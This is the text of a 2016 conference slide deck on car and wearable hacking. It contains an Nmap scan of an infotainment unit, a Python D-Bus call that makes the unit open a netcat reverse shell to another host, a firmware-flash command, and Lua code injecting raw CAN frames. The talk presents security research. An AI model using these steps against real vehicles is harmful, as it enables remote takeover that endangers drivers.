Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan 2016

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

MILAN 25-26.11.2016 www.codemotionworld.com

Andrea Pompili

[email protected] – Xilogic Corp.

WEARABLE BOTNETS AND HAPPY HACKED DRIVERS

Andrea Pompili

There are only 10 types of people in the world:

Those who understand binary, and those who don't

R8C/25 Group

64 KB Flash memory

3 KB RAM

NC30 standard library statically linked

http://deadhacker.com/2010/02/03/jtag-enumeration/

http://openocd.org/doc/html/Debug-Adapter-Hardware.html

https://github.com/synthetos/PiOCD/wiki/Using-a-Raspberry-Pi-as-a-JTAG-Dongle

http://www.dataman.com

E8a (R0E00008AKCE00)

http://www.limpkin.fr/index.php?post/2012/04/30/Hacking-a-laundry-machine-in-one-day-%28SLE4442%29

http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf

Multiple Bus (max 1Mbps)

UART or I2C (19.2Kbaud)

High Speed and Reliable (10Mbps)

Optical fiber (150Mbps)

SAE J1979

Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDT
Nmap scan report for 192.168.5.1
Host is up (0.0036s latency).
PORT       STATE  SERVICE
2011/tcp   open   raid-cc
2021/tcp   open   servexec
4400/tcp   open   unknown
6010/tcp   open   x11
6020/tcp   open   unknown
6667/tcp   open   irc
51500/tcp  open   unknown
65200/tcp  open   unknown

https://www.freedesktop.org/wiki/Software/dbus/

#!python
import dbus
bus_obj = dbus.bus.BusConnection("tcp:host=192.168.5.1, port=6667")
proxy_object = bus_obj.get_object(
    'com.harman.service.NavTrailService',
    '/com/harman/service/NavTrailService')
playerengine_iface = dbus.Interface(
    proxy_object, dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke(
    'execute',
    '{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}')

21.0.0.0/8

iocupdate -c 4 -p usr/share/V850/cmcioc.bin

[Diagram: SPI connection between two devices; signal lines SCLK, MOSI, MISO, SS]

ipc = require("ipc")
file = '/dev/ipc/ch7'
g = assert(ipc.open(file))
-- f0,02,39|91,LEN,CAN1,CAN2,CAN3,CAN4,DATA0,DATA1...
g:write(0xf0, 0x02, 91, 0x08, 0xf1, 0x86, 0xda, 0xf8,
        0x05, 0x2F, 0x51, 0x06, 0x03, 0x10, 0x00, 0x00)

Domande? Italian

مطالب أية Arabic

¿Preguntas? Spanish

Questions? English

tupoQghachmey Klingon

Sindarin

Japanese

Ερωτήσεις? Greek

вопросы? Russian